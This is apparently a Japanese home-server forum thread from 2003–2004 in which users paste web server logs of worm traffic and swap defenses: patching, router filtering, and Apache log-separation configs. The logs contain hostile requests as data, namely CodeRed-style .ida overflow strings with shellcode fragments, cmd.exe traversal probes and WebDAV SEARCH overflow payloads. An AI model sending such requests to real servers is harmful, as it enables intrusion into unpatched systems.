ごめん、動揺して説明たらずだった。

会社きて、自宅のＨＰ見てみようとしたら、書き換えられてた。
自宅鯖はルータでHTTP、FTP,DNS,SSLのポートしか空けてねえです。

はぁ…

>>208
なんか穴があるんだろうね
いい機会だから徹底的にしらべましょう

この会社に恨みがある奴がやりまくったのかな

SSLとBINDがあやしいっすね。
最近会社忙しく自宅鯖放置気味だったからバチが当たったなー…

なんていうか、自宅に帰る7時半まで手を出せないのがもどかしい…

atfr064007013.do.ppp.infoweb.ne.jp - - [04/Aug/2003:01:02:25 +0900] "GET /defaul
t.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u68
58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190
%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 332 "-" "-"
yahoobb219214144203.bbtec.net - - [04/Aug/2003:12:12:29 +0900] "GET /default.ida
?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c
3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 332 "-" "-"

この２ホスト、ここ１ヶ月ほど止まらない。
毎日回線を切ってるのか、IPアドレスは毎回変わるんだが・・・
そろそろISPのabuseにでも連絡すっかな。

>>212
> 毎日回線を切ってるのか、IPアドレスは毎回変わるんだが・・・

・・・。

ウィルス、ワーム対策としてモデムとサーバの間にルータを噛ませてさらにサーバ、
クライアントにはウィルス対策ソフトをインストールする程度ではまだ足りないでしょうか？
もちろんウィンドウのアップデート、パッチは最新のものをなるべく早く当てるようにします。

>>214
根本的にだめ。
ウイルス、ワーム、セキュリティについてのポリシーを
自分で確立すべし

俺の自宅サーバーにおけるセキュリティについての考え方のひとつに
「稼動時間を減らす」てのあるけど誰も賛同してくれん。
「馬鹿じゃねぇ？」「使えねぇ！」の連呼









うるせー馬鹿！

>>216
いや、科学技術庁も導入したぐらいだし(藁

稼働時間を減らしたところで、穴をあけっぱなしにしていれば頻繁にやってくるワームにやられるので
結局常時稼働とさほど変わらないんでないの？

セキュリティで最も重要なのは、穴をあけない、見つかったらすぐにふさぐという基本的な事項をしっかり行うこと。

うちは、CodeRedが30〜40件/日、ほとんどが韓国と中国
それから、Nimdaも30〜40連続アタック
[error][client 61.213.32.47] 千葉のCATV局だ。もー頼むよ・・・。

うちも先月までは>>219とほぼ同量のアタックがあったんだが、
1週間程度、接続元IPが韓国・中国・台湾のパケットを総蹴りにしたら
解除した後もなぜかアタックが以前より減少してる

どれくらい来てるのかな？とｵﾓﾃ2002年10月以降のログを一括検索したら4609件出てきた。
ヽ(`Д´)ﾉｳﾜｧｧｧﾝ

Nimdaの時に比べたらかなり平和だよな。
あのときはピーク時で1分間に2〜3回アクセスが続いたし。
帰省中だったので放置しているうちにログが肥大化して帰ってきたらfile system fullでかなり焦った。

　　　 (⌒V⌒)
　　　│ ＾ ＾ │＜これからも僕を応援して下さいね（＾＾）。
　　⊂|　　　　|つ
　　　（＿）（＿）　　　　　　　　　　　　　　　　　　　　　　山崎パン

今度は135の悪夢

保守age

パケット通信危うし・・・

納入先監視装置、今月は1万円を越えました×ｎ台
この先どうなることやら・・・

yahoobb219178230052.bbtec.net [10/Sep/2003:00:47:47 +0900] "GET / HTTP/1.1" "-"

デザインが変...

もう ahooBB 大迷惑。パッチ宛ててるのかどうか知らんけど。
当ててたとしたら、肝心の駆除してねぇヤツ多すぎ。
全部 bbtec.net 遮断に決定。俺は困らねぇし。

UDP LOOPアタックくらいまくりなんですがどうしたらいいですか？
特定の相手難ですが。

2003/09/21(23:14:55) W-SV 218.188.110.35 [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/09/21(23:15:01) W-SV 218.188.110.35 [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0"
2003/09/21(23:15:06) W-SV 218.188.110.35 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/09/21(23:15:12) W-SV 218.188.110.35 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"

パッチ当ててない鯖って周りにも迷惑かけて最悪だな

ahooBBキター

2003/09/22(00:25:32) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 242 "GET /scripts/root.exe?/c+dir HTTP/1.0"
2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 240 "GET /msadc/root.exe?/c+dir HTTP/1.0"
2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2003/09/22(00:25:33) W-SV YahooBB218125088142.bbtec.net(218.125.88.142) [80] 403 262 "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

IPアドレスを変えてSEARCHをかけて来てます、どうしたらいいでしょうか？
これずっとやられて、アクセス数がどんどん増えて行ってしまいます。
同時接続数が限られる環境でこの攻撃は痛いです。
だれか辞めさせる手段をご教授お願いします。
2003-09-22 11:56:38 140.112.88.18 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 11:58:03 67.128.66.123 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 11:58:04 67.128.66.123 - "" SEARCH / - 411 -
2003-09-22 12:07:06 12.168.146.99 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:07:06 12.168.146.99 - "" SEARCH / - 411 -
2003-09-22 12:10:31 62.254.0.18 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:10:31 62.254.0.18 - "" SEARCH / - 411 -
2003-09-22 12:12:38 202.64.33.192 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:12:38 202.64.27.183 - "" SEARCH / - 411 -
2003-09-22 12:13:48 81.152.119.97 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:13:48 81.152.119.97 - "" SEARCH / - 411 -
2003-09-22 12:18:41 80.222.212.13 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:18:42 80.222.212.13 - "" SEARCH / - 411 -
2003-09-22 12:19:39 194.100.73.249 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:19:39 194.100.73.249 - "" SEARCH / - 411 -
2003-09-22 12:22:34 219.0.96.166 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:22:34 219.0.96.166 - "" SEARCH / - 411 -
2003-09-22 12:31:35 81.106.226.196 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:31:36 81.106.226.196 - "" SEARCH / - 411 -
2003-09-22 12:33:22 220.36.28.75 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:33:22 220.36.28.75 - "" SEARCH / - 411 -
2003-09-22 12:39:38 68.75.21.33 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:39:38 68.75.21.33 - "" SEARCH / - 411 -
2003-09-22 12:49:59 4.65.242.242 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:49:59 4.65.242.242 - "" SEARCH / - 411 -
2003-09-22 12:50:56 61.242.82.156 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:50:56 61.242.82.156 - "" SEARCH / - 411 -
2003-09-22 12:52:25 68.122.155.202 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:52:25 68.122.155.202 - "" SEARCH / - 411 -
2003-09-22 12:52:55 63.196.240.140 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:52:57 63.196.240.140 - "" SEARCH / - 411 -
2003-09-22 12:57:34 67.115.71.91 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:57:34 67.115.71.91 - "" SEARCH / - 411 -
2003-09-22 12:58:18 217.32.133.75 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 12:58:21 217.32.133.75 - "" SEARCH / - 411 -
2003-09-22 13:01:16 138.23.162.248 - "" GET /Default.asp - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98)
2003-09-22 13:01:16 138.23.162.248 - "" SEARCH / - 411 -

ホウムペイジ作り中だよっ
http://azarashi.ddo.jp/

うちのSnortSnarfの警告ページね。


2つの異なるイグネチャーが219.96.206.60として存在しています。発信源

・65個の事例はWEB-IIS ISAPI .ida attempt
・65個の事例はWEB-IIS cmd.exe access

ここ学校なんだよね〜
あまりにウザイからwhoisでわざわざ調べて
メールで教えてあげようと思ったら。
failure noticeときたもんだ！

管理ちゃんとしようよー

>>234
219.96.206.60 = haruna.kibou.ed.jp
適当にpostmaster@とかwebmaster@に送ってみたらどうよ

いまだにcoderedとかに感染している奴氏んでしまえばいいのに

codegreenを(ry

WINNTAutoAttackっていうんですかこれ？
221.194.178.13 - - [02/Nov/2003:14:52:31 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%u898b%u77e8%
u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&\x90\x90\x90
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
（以下略）

中国人かな？

taro.eco.saitama-u.ac.jp - - [20/Nov/2003:10:48:04 +0900] "GET /scripts/nsiislog.dll HTTP/" 404

http://www.symantec.com/region/jp/sarcj/data/h/hacktool.wsrshell.html

Hacktool.WKRShell
セキュリティホール memo
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

Workstation サービスのバッファオーバーランにより、コードが実行される (828749) (MS03-049)
http://www.st.ryukoku.ac.jp/~kjm/security/memo/#20031112_MS03-049
EEYE: Windows Workstation Service Remote Buffer Overflow (eEye、2003.11.12)
http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2003.11/msg00140.html
MS03-049が危険な理由 (ZDNet)
http://www.zdnet.co.jp/enterprise/0311/14/epn02.html

445 のアタックすさまじすぎ

最近こんなのばっか
213.242.186.162 - - [30/Nov/2003:12:24:12 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
adsl-68-90-244-157.dsl.hstntx.swbell.net - - [30/Nov/2003:12:24:18 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
dyn-greek-180-227.dyn.columbia.edu - - [30/Nov/2003:12:25:06 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
63.172.94.170 - - [30/Nov/2003:12:27:53 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
adsl-63-202-55-65.dsl.frsn01.pacbell.net - - [30/Nov/2003:12:28:01 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
cache-2.sfrn.ca.webcache.rcn.net - - [30/Nov/2003:12:28:24 +0900] "GET / HTTP/1.0" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
061092205038.ctinets.com - - [30/Nov/2003:12:30:20 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
alb-24-194-36-62.nycap.rr.com - - [30/Nov/2003:12:32:56 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
adsl-66-143-248-208.dsl.snantx.swbell.net - - [30/Nov/2003:12:35:24 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
h-68-165-88-115.nycmny83.covad.net - - [30/Nov/2003:12:35:44 +0900] "GET / HTTP/1.1" 200 10 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)"
誰か対処法教えて…ログがわけわかんなくなる

ウチは、ルータで Directed Broadcast 破棄しといた

65-86-200-30.client.dsl.net - - [30/Nov/2003:20:32:26 +0900] "GET /scripts/nsiislog.dll" 404 315 -%
アメリカより。

>>242
ping に反応しなきゃ送ってこない

>>245
うちのルータもpingを排除したら迷惑な香具師も少なくなりますた

一日1500くらいアタックがくるよ。
一分に一回程度。
やんなっちゃう。
真っ当なアクセスなら1500って夢のような数字だけどさ

ルータ新しいのにかえようかなあ
pingを排除できるルータがあるんならかえたい。
けど、金ない。
よわったのお

>>247
iptables -A INPUT -p icmp -i ppp+ -j DROP
ｽﾚ違いﾚｽ

なんかこのスレ見て自分の鯖が心配になってきた。
確認する方法と防ぐ方法きぼんぬ。

OSがWindowsならWindowsUｐだて汁！
他のOSはｼﾗﾈ

>>249
linuxとかにしる

>>249
鯖の電源切れば心配しなくてもよくなるYO

良スレage

同じIPから毎日のように来るので
調べてみたらどうやらクライアント機らしい。
同じ時間帯に集中するのは､その時間帯に電源入れてるから。
updateやウイルスチェックぐらいしろと…

　　　　　　　巛彡彡ミミミミミ彡彡
　　　　　　 巛巛巛巛巛巛巛彡彡
　　　r､r.r ､|:::::　　　　　 　　　　　|　
　　r |_,|_,|_,||::::::　　　　 ⌒　　　⌒|
　　|_,|_,|_,|/⌒　　　　 -="- 　(-="　　　　
　　|_,|_,|_人そ(^i　　　 '"" ) ･ ･)""ヽ　　
　　|　)　　 ヽﾉ　|.　　┃｀ー-ﾆ-ｲ｀┃　　　　そうでっか、そうでっか、なるほどね
　　|　　`".｀´ 　ﾉ　　 ┃　　⌒ 　┃|　　
　 人　　入＿ノ´　　　┃　　　　┃ﾉ＼　
／　　＼＿／＼＼　　 ┗━━┛/ ＼＼
　　　　　 ／　　 ＼　ト ───ｲ/　　 ヽヽ
　　　　 /　　　　　 ｀　─┬─ イ　　　　 i i
　　　　/　　　　　　　　　 | 　　　　　Y　　| |
　　　 / 　　　　　　　　　 | 　　　　　ヽ＿_|_|

　　　　　　　巛彡彡ミミミミミ彡彡
　　　　　　 巛巛巛巛巛巛巛彡彡
　　　r､r.r ､|:::::　　　　　 　　　　　|
　　r |_,|_,|_,||::::::　　　　 ／'　　'＼ |
　　|_,|_,|_,|/⌒　　　 　 (・ )　　(・ )|
　　|_,|_,|_人そ(^i　　　　⌒ ) ･･)'⌒ヽ
　　|　)　　 ヽﾉ　|.　　　┏━━━┓|
　　|　　`".｀´ 　ﾉ　　 ┃　ノ￣i　┃|
　 人　　入＿ノ´　　　┃ヽﾆﾆノ┃ﾉ＼　　　・・・・で？seireiやnekoninがサービス悪いとでもいいたいの？
／　　＼＿／＼＼　　 ┗━━┛/|＼＼
　　　　　 ／　　 ＼　ト ───ｲ/　　 ヽヽ
　　　　 /　　　　　 ｀　─┬─ イ　　　　 i i
　　　　/　　　　　　　　　 | 　　　　　Y　　|

>>247
1500アタック／日？普通だよ、普通。
>>249
FW・フィルタ付きのルータを導入し、SYSLOGを見れ。

最近、時々来る "GET /sumthin"が不気味だな。

200.119.14.xxx - - [11/Feb/2004:00:28:41 +0900] "GET /sumthin HTTP/1.0" 404 3720 "-" "-"

>>257
それはサムスンの綴りを間違えたのです。



ってのは冗談で、
ググるとすこしはわかるかもしれませんよ。

ワームじゃないんだけど
韓国からのアクセスが多い、
ログにIPは違うけどIE 5.5 Windows98がずらっと並んでるんだよね
鯖立てたばかりでHPも工事中でTOPページだけ、アクセスなんて殆ど無いのに、
一時間に3回ぐらいの割合で入ってる
毎回違う串さして同一人物がやってるんだろうか…
他にログが無くてこればっかり並んでるから激しく怖い

Windows98のIE5.5を詐称するならワーム
たしかWelchiaとかいう

218.108.238.159 - - [08/Mar/2004:19:26:05 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
218.79.212.100 - - [08/Mar/2004:20:58:49 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
218.13.247.16 - - [09/Mar/2004:12:23:38 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
218.84.159.6 - - [09/Mar/2004:12:53:39 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
218.0.209.6 - - [09/Mar/2004:15:06:01 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
218.13.49.63 - - [09/Mar/2004:15:51:22 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
218.23.96.176 - - [09/Mar/2004:16:07:40 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
218.94.194.252 - - [09/Mar/2004:22:55:53 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
218.29.237.46 - - [09/Mar/2004:23:47:40 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
61.235.111.183 - - [10/Mar/2004:08:45:59 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
61.46.6.210 - - [10/Mar/2004:09:27:14 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
61.51.241.47 - - [10/Mar/2004:10:11:14 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
61.178.173.142 - - [10/Mar/2004:15:35:39 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
61.210.180.3 - - [10/Mar/2004:18:02:40 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
61.92.10.199 - - [10/Mar/2004:18:59:06 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
61.232.181.151 - - [10/Mar/2004:21:36:15 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
61.92.205.94 - - [11/Mar/2004:03:39:46 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"
218.61.20.56 - - [12/Mar/2004:01:41:09 +0900] "SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90" 414 271 "-" "-"

219.133.182.176 - - [10/Mar/2004:13:48:10 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-"
219.145.4.26 - - [10/Mar/2004:20:28:03 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-"
219.133.125.221 - - [11/Mar/2004:00:34:39 +0900] "SEARCH /\x90\x02\xb1(略)x90\x90\x90\x90" 414 271 "-" "-"

FTPでいろんなアカウントとパスを組み合わせてくるやつが居るけど、
あれは単に割れ鯖をさがしてるクローラー？

usen-221x114x94x213.ap-us01.usen.ad.jp - - [22/Mar/2004:16:29:42 +0900] "SEARCH
/\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x0
2\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x0
2\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1（ｒｙ

('-`).。oO（鬱陶しいことこの上ないのだが

220.145.233.60 - - [31/Mar/2004:10:29:15 +0900] "SEARCH /\x90\x02\ (ry
大量にキテル…しかも1リクエストに32Kbyteもある…

鯖ではないだろうけど、ウイルス対策くらいしっかりしてほしいなぁ

ログを切り分けたいのですが上手くいかね。

SetEnvIf Request_URI "^/\\x90\\x02" worm nolog
SetEnvIf Request_URI "^/\x90\x02" worm nolog


アドバイスよろ。

>>266
http://pc3.2ch.net/test/read.cgi/unix/1058797852/812-814
情報が分散するのは良くないよな

>>267
ありがと，そっちのスレはチェックしてませんでした。

SetEnvIf じゃ分けれませんか(´･ω･`)ｼｮﾎﾞｰﾝ

>>268
なんとな〜くだけど、vhost使って分けられそうな気がしない？
大抵のウィルスはhostを名乗らないので、別けられそうな気がする

とか思いつつ、俺は放置してるわけだが

いい機会なんで試してみたが、分離は可能でした
結果だけ報告

>>266
パイプ経由のロギングを利用するのはどうよ？

CustomLog "|/root/sh/logfilter >> /var/log/httpd/access_log" combined env=!nolog

とでもして、/root/sh/logfilterスクリプト内で"SEARCH /\x90\x02\…"は弾くようにするとか。

267のリンク先の814だが。

Mac 板の UNIX スレだか鯖スレだかにも書いたような気がするが、
<VirtualHost> で分離するのは当然有効。
ワーム以外にも踏台探しのアフォによるアクセスも隔離できることが多いのでオススメ。

あるいは、「異常なログを隔離する」ではなく、
CustomLog /dev/null common
CustomLog /path/to/access_log combined env=REMOTE_ADDR
のように、環境変数が正常にセットされているもののみ隔離するという方法でも
できそうだが、これはうまくいくかどうかは試していない。

>>272
<VirtualHost>でhost名を知らないアクセス＝ワームを分離する方法ですが、
これだとローカルからのIP直打ちアクセスも分離されてしまうんじゃないでしょうか。
わざわざ串を刺すのはちょっと…。

>>273
うちのルータ(というより*BSD箱だけど)はグローバルIPでアクセスしても応答してくれるから問題は無いし
hosts に書くかDNS鯖に細工をすれば対処できませんか？

それに自分のアクセスがログに記録されないぐらいならデバック時以外は被害は少ないと思われ

272だが。
IP 直打ちでも Host: にその IP アドレスが入るので、
プライベートアドレスを ServerAlias に指定すればよし。

NameVirtualHost *
<VirtualHost *>
ServerName dummy.host
CustomLog [隔離ログ]
...
</VirtualHost>
<VirtualHost *>
ServerName xxx.yyy.zzz
ServerAlias localhost 127.0.0.1 192.168.0.1 ...
CustomLog [ほんとのログ]
...
</VirtualHost>

このように設定すれば、Host: がないか、あってもグローバルの IP アドレスの場合は
dummy.host の設定が使われる。

>>274-275

大変参考になりました。

で、>>261他のログを分離できたとはいえ、そのままではログファイルを圧迫することに変わりないので
アクセスログの書式も

　\"%r\"　→　\"%m %!414U %H\"

として、414(HTTP_REQUEST_URI_TOO_LARGE)のときはURLを記録しないように、
ついでにクソ長いクエリ送ってくるワーム用にクエリ文字列を記録しないよう変更しました。

どうしよう。ログにクソクエリの跡が

ワーム用の<VirtualHost>設定でDocumentRootを/dev/nullにしちゃうのはマズいでしょうか？

SEARCH /\x90\x02\xb1（中略）\x90\x90\x90\x90 で来るヤツって
www のホスト名で来てませんか？

>>278
/dev/zeroにしてください

>>276
レスありがとうございます。あれから調べてみたところ、どうやら/dev/nullや/dev/zeroといった
特殊デバイスはApacheではアクセスできないようになっているみたいですね。
実験的にDocumentRootに設定してみましたが、エラーログには

[Tue Apr 6 12:34:56 2004] [error] [client xxx.xxx.xxx.xxx] object is not a file, directory or symlink: /dev/zero

と、/var/hogeのように存在しないディレクトリを設定した時と同じエラーが記録されていました。
まあワームにわざわざディレクトリを用意するのも馬鹿らしいので、/dev/zero指定にしようと思います。

いや、/dev/zeroはネタだろ…。

/dev/shm

保守

誘導されてきました．
SEARCHとかのワーム攻撃を避けるために，
NGSecureWeb for Linux
http://canon-sol.jp/product/ng/index.html
とか
SRP(Secure Reverse Proxy)
http://www.gomibako.com/~umesan/srp/
とか使ってる人います？役に立ちますかね？

>>285
個人で鯖立ててる分には>>260以降の対策で十分なので要らないな。
まあわざわざ製品を使おうと考えてるところを見ると、業務用なんだろうけど。

>>286
ここは自宅鯖板

で、名前にsageを入れる意味は何なんだろう

自宅で鯖っつか社長の趣味で意味無く鯖立てたとか

最近のウィルスによるアクセスはその人達が原因かな

最近、ワーム多すぎ。ログがこればっかり。

ど、どれだ？？（汗

ログなんか見てネーヨ

http://www.microsoft.com/japan/security/incident/sasser.mspx
Sasser ワームについてのお知らせ

休み明けに注意

WOLでスタンバイにしているが、すぐに起動してしまうのは、ワームのせいなのかよ・・・。

緊急浮上

●.....●..●..●...●●..●●...●●..●●●....●●●●..●●.....●●●..●..●

無料のウイルス対策ソフトなどのセキュリティソフト一覧
http://www.geocities.co.jp/SiliconValley-Cupertino/2010/security.html

●.●.●.●..●...●●.●..●●.●●......●..●●...●●...●●●.....●.●...●

感染しているPCを持っているユーザーに通知してあげたい
HPがあってメルアド書いててくれたら一番、楽なんだけどね
Windowsのメッセージサービスだっけ？　あれって日本語も通るんだっけ？

気づいてくれないかなぁ・・・
218.114.60.82 - - [21/Jun/2004:21:55:14 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 1042 "-" "-"

>>296
messengerサービスは日本語通るよ。

ほらよ。

ワームの場合やポートスキャンなどのIPアドレスベースのアクセスは、クエリを
ログに保存しない。かつ、すべてのリクエストを拒否する。
おまけで、拒否した403エラーをerror_logにも残さない。

LogFormat "%h %l %u %t \"%m %U %H\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" attacked
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T" combined

# Reject IP Adress Access
<VirtualHost XXX.XXX.XXX.XXX:80>
CustomLog logs/access_log attacked
ErrorLog /dev/null

<Directory ~ ".*">
Order deny,allow
Deny from all
</Directory>
</VirtualHost>

<VirtualHost XXX.XXX.XXX.XXX:80>
ServerName www.example.com
DocumentRoot /usr/local/apache/htdocs
ServerAdmin [email protected]
CustomLog logs/example_access_log extended combined
ErrorLog logs/example_error_log
</VirtualHost>

<VirtualHost XXX.XXX.XXX.XXX:80>
…
</VirtualHost>

<VirtualHost XXX.XXX.XXX.XXX:80>
…
</VirtualHost>

ふふーん

age

218.88.235.240 - - [23/Jul/2004:03:00:50 +0900] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCC･･･

アクセスしてみたら中国のサイトみたいだけど･･･

>>301
それアタックツールじゃない？
WinNTAutoAttackっていうやつ

203.205.99.199 - - [22/Jul/2004:01:33:57 +0900] "\xc8C\xc0\x1d" 501 - "-" "-"
203.205.99.199 - - [22/Jul/2004:01:34:44 +0900] "HZ\xc0\x1d" 501 - "-" "-"
203.205.99.199 - - [22/Jul/2004:01:38:12 +0900] "0\x9f\xc0\x1d" 501 - "-" "-"

最近、こういうのが来るようになったんですけど．．．．

>>303
うちにも来てますね。同じようなの。
メソッドがなくて、リクエスト文字列はバラバラ。
なんらかのワームと思われますけど、
共通の指紋がなくて検索に掛からずいまだ正体不明です。

Googlebotってのが怖い・・・
誰か助けて。

>>305
やべーよ、それに狙われたら終わりだよ。
個人情報全部抜かれてるよ、きっと。

>>305
うちなんかあえてGooglebotが来やすいように対策して
相手をはめてやろうと頑張ってるんだけど全然こないよ



orz

>>307

もしかして、昔、嘘教えられた人？

Googlebotに来て欲しいなら、robots.txt に

User-Agent: *
Disallow: /

て、書いちゃダメだよ。

人違いならイイんだけど、昔、検索サイトに登録されたいのでロボットに
来て欲しいという人に対して、上記ファイルを書けばロボットが来てくれる
と嘘を教えた人が居たから。

今でも嘘を信じてロボットを待ってるとしたら可哀想で。。。

>308
スレ違い。

# robots.txt を置いて検索蹴っていたとしても、ロボットが来なくなる
# わけじゃない。
# robots.txtは探すから。
#
# それすら来ない(accessログに残っていない)なら、、、
#
#
# まぁ、イ�` とだけ言っておこう。

先方へのお知らせ用のテンプレートってないでしょうかか？

やられていると思われるサーバーから当方のサーバーに、
SSHで進入しようとしたログを見つけました。
国内のとある建築デザイン会社のネットワーク内からなんですが。
お知らせしてあげようかなと思うものの、
一からメール起こすのもなんだかなぁと。

